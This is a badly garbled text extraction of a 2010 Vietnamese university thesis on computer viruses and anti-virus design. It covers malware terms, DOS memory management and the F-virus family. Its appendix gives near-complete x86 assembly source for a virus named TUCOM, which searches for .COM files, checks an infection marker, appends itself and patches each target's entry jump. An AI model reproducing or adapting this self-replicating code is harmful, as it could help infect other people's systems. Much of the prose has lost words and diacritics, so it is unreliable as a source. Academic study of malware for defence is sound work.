– – -VIRUS An Giang, 05/2010 – – -VIRUS : An Giang, 05/2010 -Virus LỜI CẢM ƠN  Tôi xin gửi lời cảm ơn chân thành đến Ban Giám Hiệu, Ban chủ nhiệm ho thuật – Công nghệ – Môi truờng, thầy cô củ trường Đại học An Giang tập thể gi o vi n ho thuật – Cơng nghệ – Mơi truờng tận tình giảng dạy, truyền đạt kiến thức, kinh nghiện quý b u khích lệ, hỗ trợ nhiều mặt cho suốt bốn năm đại học chuẩn bị hành trang vào đời Đặc biệt xin chân thành cảm ơn hs gu n hị ru ền người sẵn sàng tận tình hướng dẫn giúp đỡ động viên tơi suốt qu trình th c đề tài Tôi c ng in gửi lời cảm đến người thân bạn b g n b chi s giúp đỡ động vi n suốt thời gi n học tập th c đề tài Mặc dù cố g ng hoàn thành đề tài phạm vi khả cho phép ch c ch n tránh khỏi thiếu sót Tơi mong nhận s thơng cảm, góp ý tận tình bảo Thầy Cơ bạn ong u n ngà 14 th ng năm Sinh viên th c oàng ú -Virus  k nh - : : G : T : -Virus T - : : – virus TUCOM T -Virus Trang : M u 1 Gi i thi tài M c tiêu c tài ng, ph m vi nghiên c u c tài Ý c th c tiễn c tài : M ts v n virus máy tính Thu t ng virus máy tính 1.1 Virus 1.2 Worm 1.3 Trojan Horse 1.4 Adware 1.5 Spyware 1.6 Phishing 1.7 Attacker tool L ch s phát tri n c a virus máy tính : -Virus 11 Gi i thi u F-Virus 11 1.1 K thu t lây lan 12 1.2 K thu m b o tính tồn t i nh t 14 1.3 K thu ng trú 15 1.4 K thu t ng y trang gây nhiễu 16 1.5 K thu t phá ho i 17 – Virus TUCOM 18 2.1 ễ 18 2.2 ễ 25 2.3 28 2.4 30 2.5 34 : Xây d 36 -virus Software) 36 1.1 Phát hi n (Detection) 36 1.2 37 1.3 37 1.4 Phòng ch ng 38 -virus Techniques) 39 2.1 39 2.2 Heuristics 40 2.3 41 2.4 havior Blocker) 42 -Virus 2.5 2.6 2.7 2.8 2.9 Tài li 43 45 46 48 49 – 50 : K t lu n 51 51 52 u tham kh o 53 – Qu n lý t p tin vùng nh i DOS 54 – Virus TUCOM 68 -Virus Danh m Trang : : : : : ồ ễ - 2009 10 u File 12 i File 13 19 50 Danh m Trang : 20 -Virus ươ Mở ầu  Gi i thi tài Ngày nay, máy gi i trí c a nhi c s d ng r ng rãi, tr n h c t p, làm vi c i Thông tin d li u nh ng tài nguyên quý giá c máy tính kẻ x c s quan tr ng c a d li u máy tính, nhi u ki n th c tin h c c m i dùng i lo i virus tin h c v i nh ng m phá h y h th ng, l y c p thơng tin th m chí xóa b d li máy c i dùng Virus máy tính tr thành n i lo c a nh t nh n nh ng i s d ng máy tính i làm cơng tác tin h c CNTT phát tri i thi t b tr c bi t s phát tri n c a Internet t u ki n cho s lây lan phát tán virus nhanh chóng, b t kỳ lây nhiễm virus s phát tri n c t virus nh m kh ng ch , tiêu di t kh c ph c h u qu i v i nh i quy ng h p c th c u lý Th nh t, virus máy tính cẩ ln ngày tinh v trình di t virus khó mà phát hi d i nhi u d ng khác nhau, m t s c, ho c m u qu c c a mà khơng có hi u qu khơng có danh m c Th nghiên c u i v i d ng virus khác c phát hi n m c mã nh n bi t m t virus ln b t T ng, theo sau s i c a virus, có virus m i có c s t n cơng b t ng c a lo i virus m trình di t virus khơng th ph n ng k p, ch có th kh c ph ch khơng có kh n k p th i V v virus phòng ch ng virus báo bi n th virus nh c h u qu c a virus gây c nhi u nhà nghiên c u nm n d ng, ng h p lây nhiễm, ti m ẩn c phát hi nhiễm h th iv im t n k p th i, ch t; có kh ng phịng tránh tình hu ng lây p nh t m u virus m i Trang -Virus ong song v i vi c s d , i dùng c n ph i trang b cho nh ng ki n th c nh mc a nh v ho n c có th t phịng, ch ng kh c ph c nh ng h u qu virus gây ra, b o v an tồn d li u ó lý tơi ch tài Virus máy tính có nhi u lo i khác nhau, cách lây lan, ho t ph c t p, vi c tìm hi u h t v nghiên c u Nh n bi nghiên c t ng, s phá ho i c a v virus máy tính c n ph i có m t th i u ki n nghiên c u th c t c ng c th tài ch cho vi c nghiên c Virus -virus) ch lây lan cách th c ho ng c a m t virus máy tính F-virus m t lo nên tơi ch i t r t s m, th hi n rõ b n ch ng nghiên c u c n hình nghiên c u lo i virus máy tính khác M c tiêu tài n vi c tìm hi u, kh o sát lo th c n v lo i virus máy tính c bi n F-virus gi i pháp xây d ng ph n m m ki m soát tiêu di t virus d ng F-virus ượng, phạm vi nghiên cứu tài u F-virus – Windows Ý ĩa k a ọc th c ti n tài Trang -Virus ươ q a Một s vấ ến virus máy tính  Thuật ngữ virus máy tính m c a NIST – National Institute of Standart and Technology (vi n tiêu D at chuẩn – công ngh qu c gia Hoa Kỳ) v c virus máy w tính NIST s d ng thu t ng ch virus máy tính (theo cách g i cg Vi ch c h i m ổn h m t cách bí m t vào h th ng v i m c chèn n tính bí m t, tính tồn v n ho c : tính sẵn sàng c a h th ng Malware bao hàm r t nhi u lo W Trojan horse, backdoor, rootkit, keylogger) … Spyware, Adware, Phishing, 1.1 Virus Virus m t lo c h i có kh nhân b n lây nhiễm vào t ph i ln ln bám vào m t v t ch p tin d li u ho c t p tin ng d lây lan c chia thành hai nhóm chính: Compiled virus, Interpreted virus - Compiled virus: virus mà mã th c thi c m t trình biên d có th th c thi tr c ti p t h c d ch hoàn ch nh b i u hành bao gồm hai lo i: Boot virus J nh t phổ bi n pha tr n b i boot virus File virus m t phiên b n - Interpreted virus: m t tổ h p c a mã nguồn ch th is h tr c a m t ng d ng c th ho c m t d ch v c th h th ng Virus ki u ch m tt pl n ng d ng g i m c th c thi Macro virus, scripting virus virus n m d ng Macro virus r t phổ bi n ng d ng Microsoft Office t n d ng kh m soát vi c t o m th c thi lây nhiễm S khác gi a macro virus scripting virus là: Macro virus t p l nh th c thi b i ng d ng c th (ví d hành (ví d p l nh ch y b ng m t service c a h u Stages) M t s d u hi u cho th y s có m t virus máy tính: Trang -Virus Tổ chức qu n lý vùng nh T t c File mu n thi hành ph c DOS t i vào vùng nh V DOS ph i tổ ch c i có cách tổ ch c qu n lý vùng nh có th thi hành File n c a DOS có th qu n lý qu n lý b u a ch tt Vùng nh a ch cao nh t (n u có th c g i vùng nh ch c T t c vùng nh a 2.1 Vùng RAM n m quy u n c u hành ph B c chia thành hai ph n chính: m th i 1.1.1 Phần h ng t, h c) 00FFFFh … c dùng cho ROM hình ph n h n 1Mb vùng nh Vùng nh DOS u hành ut ồm c b ng vector a ch th p nh u hành b ng Buffer c a (th c ch t ph n l n hai file h th ng IO.SYS Y c khai báo config.sys, ph ng trú c a ổ COMMAND.COM Ph n h ,s 1.1.2 Phầ ươ ạm thời c g i vùng nh ho (Transient Program Area), vùng nh sau vùng nh h ch cao nh t có th ng hay cịn g i vùng TPA u hành có th a c tổ ch c thành t ng kh i t o thành m t chu i Các File ct mang tính t m th i Segment Offset Gi i thích 0000 0000 B ng vector ng : 6* 0040 0000 Vùng nh d li u ROM – BIOS 0050 0000 Vùng nh d li u DOS a ch Trang 62 -Virus xxxx 0000 xxxx 0000 xxxx 0000 xxxx Mã vào c a DOS Y m c th p (t u n ng t DOS (t 20 – 3F File MSDOS.SYS Buffer c a DOS, vùng d li u device driver Ph 0000 ng trú c a COMMAND.COM bao gồm ph ng t 21h, 22h, 24h xxxx 0000 ng trú (TRS) d li u xxxx 0000 c load l n xxxx u n Ph n t m th i c a COMMAND.COM Ph n s t i l i n u b 0000 q a 2.2 Các q 2.2.1 Chứ ến vùng nh DOS n lý Gồm ch p phát, gi u ch c b nh C p phát vùng nh : Vào AH = 48h c vùng nh c n c n) Ra: N u CF =  AX ch a mã l i BX s vùng nh t i c N u CF =  AX segment c a vùng nh mà DOS c p phát theo yêu c u Gi i phóng vùng nh : vùng nh xin c nên dùng ch gi v DOS (n n, m d t, quy c thi hành gi i phóng vùng nh m u n thu c dùng ch p phát Vào AH = 49h ES = Segment c a vùng nh c c gi i phóng Trang 63 -Virus Ra AX = mã l i n u CF = Có th s d ng ch m nh vùng nh nh vùng nh (k c c vùng nh : u ch m c tiên ph Vào n c dùng ch c n u ch nh l c vùng nh AH = 04Ah ES = segment c a kh i vùng nh c c yêu c u c Ra thi hành u ch nh u ch nh AX = mã l i n i l n nh t dùng c ường trú: 2.2.2 Chứ ng, m m d t, quy l i cho DOS, lúc này, m i vùng nh t kỳ m u n s cc ct c trao c gi i phóng, s a rồ i v i m t s ph n m m có u c u kích ho t t c th i n u c n, bu c ph n m in m ng trú RAM không b b t kỳ ph n m DOS cung c p ch th c hi u sau: S d ng ng t 27h: Vào: ng trú Segment s a ch cu i (offset) c n c tính theo PSP Ra: Ch khơng gi i h n DX ch có th có th cm DOS h tr thêm m t ch kh c ph u này, a ng t 21h ng trú (Terminal and Stay Resident – TSR) Ch m d Vào: c giá tr l n nh t AH = 31h AL = mã (exit code) c vùng nh c ng trú (tính theo n) Trang 64 -Virus nh module ph i t i vào d Module ph u tiên c t , khơng tính ph Module b c c a File tr mb c c a ph n c c a EXE Header ut ic m sau EXE Header c Header*16h) a ch n cho Module t i START_SEG luôn PSP +10h c Module vào START_SEG: 0000h t tr m vào c a b c a b ng này, ti n s : nh v - nh v , ng v i m i m c (Item) c Item vào t 16 bit (i_OFF i_SEG) a ch nh v tham chi n RELO_SEG c tình: RELO_SEG = START_SEG + i_SEG - c giá tr t a ch c tham chi n b a ch ct o b i RELO_SEG:i_OFF - Ti nh v l i b ng cách c ng giá tr v c v i START_SEG - Tr l i giá tr m a ch R :: nh v xong, DOS s phân ph i vùng nh ng v i giá tr vùng nh t i i thi u EXE Header Kh i t o giá tr ghi: - c tr t i PSP - AX ch s h p l c - Kh i t o Stack b R nh nh v l i SS SP theo giá tr : SS = START_SEG + RELO_SS SP = EXE_SP Trang 60 -Virus Ra: Không Ch c c ph m c a ng t 27h, kh ng trú tt it thơng báo cho bi t tình tr ng thi hành c u t version 3.x.x, ng t 27h c a DOS th c ch t ch m t bi n d ng c a ch ổi giá tr u ng n g i ch Gi a ng t 21h v i mã l i ng trú: M nh m c g i, s ti n ng trú tr nên cồng k nh vùng nn gi i quy t m t s ph n m vùng nh , nhiên, n u vùng nh m vi c gi i phóng th c ch n thi i phóng ng khác s d ng i ch ng ng trú sau vùng nh c áp d d ng ch COMMAND.COM m t l n n ng l i l nh (d u nh is d il n tồn t i vùng nh s k t thúc n ch tr quy u n Vi c gi i s d ng thi hành l nh Exit d u nh k Ph n vùng nh t m th m t c u tr ng trú i l nh ấ 2.3 thi hành ng ng t c n thi t cho phím hotkey B ng copy l n s d u nh u này, m t c tổ ch c thành t ng kh i, m i kh u kh i g i MCB Th c ch t ch phát, hi u ch nh vùng nh c qu n lý b ng vùng nh (gi i phóng, xin c p c DOS ti nh chu i MCB ng m c vùng nh mà qu n : lý N i dung tham s c B ng tham s c u trúc MCB Offset Size 00 byte Nội dung : nh danh MCB : i : i MCB cu i Trang 65 -Virus 01-02 byte a ch PSP c a MCB Cho bi t vùng nh c MCB qu n lý hi n tr N u giá tr c s d ng, c l i giá tr PSP c nh lý DOS s bi t vùng nh c v a ch m d t gi 03-04 byte c trao quy n) c vùng nh mà MCB qu n lý Nó cho bi t kho ng cách t m t MCB th n m t MCB k ti MCB b nh 05-0F 11 byte byte ID ck tn v y mà t danh sách liên k t n byte byte a PSP S 11 byte ượng byte ưa d ng C u trúc m t MCB n pm vùng th nh nh , DOS c ch a kh i tham s , ng c ch a ng c a Vi cc d ng COM s r b nh , ngồi khơng có thêm b t c EXE dễ cm cc iv ng ng c t o trình biên d ng n p m nh DOS s cung c b khơng gian nh cịn l i c a b nh Trang 66 -Virus 0000:0000 H B u vùng TPA u hành Memory Control Block c qu n lý b i MCB Memory Control Block Liên k t gi a MCB c qu n lý b i MCB Memory Control Block c qu n lý b i MCB K t thúc vùng TPA K t thúc MCB Qu n lý b nh b ng MCB c a DOS Trang 67 -Virus – Virus TUCOM ; -; ;chuong trinh virus TUCOM ;Tim va lay nhiem vao cac File COM ; ; Code segment byte assume CS:Code,DS:Code,SS:Nothing org 100h Chuong_Trinh_Chinh: jmp near ptr Diem_Dau db 'VR' mov ah,4ch mov al,00h int 21h ;phan ma virus Virus: COMFILE db '*.COM',0 Diem_dau: ;danh dau diem bat dau virus call Bat_Dau Bat_Dau: ;bat dau cua virus mov bp,sp sub word ptr [bp],offset Bat_Dau - offset Virus mov dx,offset DTA mov ah,1ah int 21h Trang 68 -Virus call Tim_File jnz Thoat_Virus Thoat_Virus: ;thoat khoi virus, tra ve vi tri 100h mov dx,80h mov ah,1ah int 21h mov di,100h lea si,[bx+Virus-Chuong_Trinh_Chinh-3] push di movsw movsb ret Ma_Dau: nop nop nop nop nop ; ; ;Thu tuc tim File, Phan su dung chuc nang 4Eh de tim file COM dau tien, neu tim thay file com ;kiem tra tiep de chac chan file van chua bi nhiem hoac co kich thuoc nho on 64kb de co the chen them ma virus vao ;Sau su dung tiep chuc nang 4F de tim tiep Trang 69 -Virus ; ; Tim_File: ; Tim file doi tuong de lay nhiem mov dx,[bp] add dx,offset COMFILE - OFFSET Virus mov cx,3Fh ;tim tat cac ca file, khong dua vao thuoc tinh mov ah,4Eh ; goi chuc nang tim kiem dau tien int 21h Lap: or al,al jnz ;kiem tra viet tim thay file cong khong Khong_Thay ;al = -> khong thay, all = -> tim thay call File_OK jz Khong_Thay mov ah,4Fh int 21h jmp Lap Khong_Thay: ret File_OK: mov dx,offset Ten_File ;neu tim thay file com, mo file de kiem tra mov ax,3D02h ;su dung chuc nang 3dh de mo int 21h ;neu mo khong cong thi khong thuc hien lay jc Khong_Lay ;thuc hien doc byte dau cua file duoc tim thay de kiem tra xem da co mat virus TUCOM tren file chua ;su dung chuc nang 3F de doc Trang 70 -Virus mov bx,ax push bx ;luu vao vao stack mov cx,5 mov dx,Offset Byte_Dau mov ah,3Fh int 21h pop bx mov ah,3Eh ;dong file lai int 21h mov ax,word ptr [Kich_Thuoc] ;kiem tra kinh thuoc file co the ghi them ma virus vao khong add ax,offset EndVirus - offset Virus jc Khong_Lay cmp Byte ptr [Byte_Dau],0E9h ;so sanh byte dau co phao la lenh nhay khong je Khong_Lay cmp word ptr [Byte_Dau + 3],5652h ;kiem tra byte tiep theo co phai la "VR" khong je Khong_Lay call Lay_Nhiem mov dx,offset Ten_File mov word ptr [HANDLE],24h mov ah,09h int 21h Khong_Lay: Trang 71 -Virus mov al,1 or al,al ret ; ; ;Thu tuc thuc hien chen doan ma virus vao file tim duoc ; ; Lay_Nhiem: ;lay nhiem vao file doi tuong duoc tim thay ;Mo File su dung chuc nang 3Dh, mo che doc/ghi al = 02, tra ve ax chua file Handle mov dx,offset Ten_File mov ax,3D02h int 21h ;di chuyen tro File den cuoi file, su dung chuc nang 42h, bx la file Handle mov word ptr [HANDLE],ax xor cx,cx mov dx,cx mov bx,word ptr [HANDLE] mov ax,4202h int 21h ;luu lai gio tao file dung chuc nang 5700h mov bx,word ptr [HANDLE] mov ax,5700h int 21h push dx ;cat tao file vao stack push cx ;ghi doan ma virus vao cuoi file, su dung chuc nang 40h mov cx,offset Diem_Cuoi - offset Virus Trang 72 -Virus mov dx,[bp] mov bx,word ptr [HANDLE] mov ah,40h int 21h ;di chuyen tro ve dau file, de ghi lai byte dau vao day xor cx,cx mov dx,word ptr [Kich_Thuoc] add dx,offset Ma_Dau - offset Virus mov bx,word ptr [HANDLE] mov ax,4200h int 21h ;ghi byte dau la dau hieu cua virus mov cx,5 mov bx,word ptr [HANDLE] mov dx,offset Byte_Dau mov ah,40h int 21h xor cx,cx mov dx,cx mov bx,word ptr [HANDLE] mov ax,4200h int 21h mov bx,[bp] mov byte ptr [Byte_Dau],0E9h mov ax,word ptr [Kich_Thuoc] add ax,offset Diem_Dau - offset Virus - Trang 73 -Virus mov word ptr [Byte_Dau + 1],ax mov word ptr [Byte_Dau + 3],5256h mov cx,5 mov dx,offset Byte_Dau mov bx,word ptr [HANDLE] mov ah,40h int 21h ;tra lai gio tao file su dung chuc nang 5701h mov bx,word ptr [HANDLE] mov ax,5701h pop cx pop dx ;Dong file mov bx,word ptr [HANDLE] mov ah,3Eh int 21h ret Diem_Cuoi: ;danh dau diem cuoi cua virus ; ; ;Khai bao du lieu ; ; EndVirus equ $ +212 org 0FF2Ah DTA db 1ah dup(?) ;vung lam viec cua chuc nang tim kiem Kich_Thuoc dw 0,0 ;noi luu kich thuoc cua file Ten_File dw 13 dup(?) ;luu duong dan cua file Trang 74 -Virus HANDLE dw ;file Handle Byte_Dau db 0,0,0,0,0 ;luu giu byte dau de doc va ghi vao file Dia_Chi_Bat_Dau dw ? ;dia chi bat dau cua virus Code ends end Chuong_Trinh_Chinh Trang 75 ... nghiên c u lo i virus máy tính khác M c tiêu tài n vi c tìm hi u, kh o sát lo th c n v lo i virus máy tính c bi n F -virus gi i pháp xây d ng ph n m m ki m soát tiêu di t virus d ng F -virus ượng,... DW Trang 28 -Virus ổ ổ ỡ ổ ỡ : Mov bx,wor ptr [SI+HANDLE_OFS] ỳ ẩ 8 Trang 29 -Virus ổ ễ : Mov dx,word ptr [Dia_Chi_Bat_Dau] Add 2.4 dx,Offset COMFILE – Offset Virus Mov dx,offset COMFILE k : ễ... Thoat_Tim: Trang 21 -Virus ; Ret COMFILE ‘* db ’ d : EndVirus– : File_OK: ; Mov ax, word ptr [Kich_Thuoc] Add ax,offset EndVirus – Offset Virus + 100h Jc Khong_Lay ; Lay_File_Nay: Xor ax,ax ;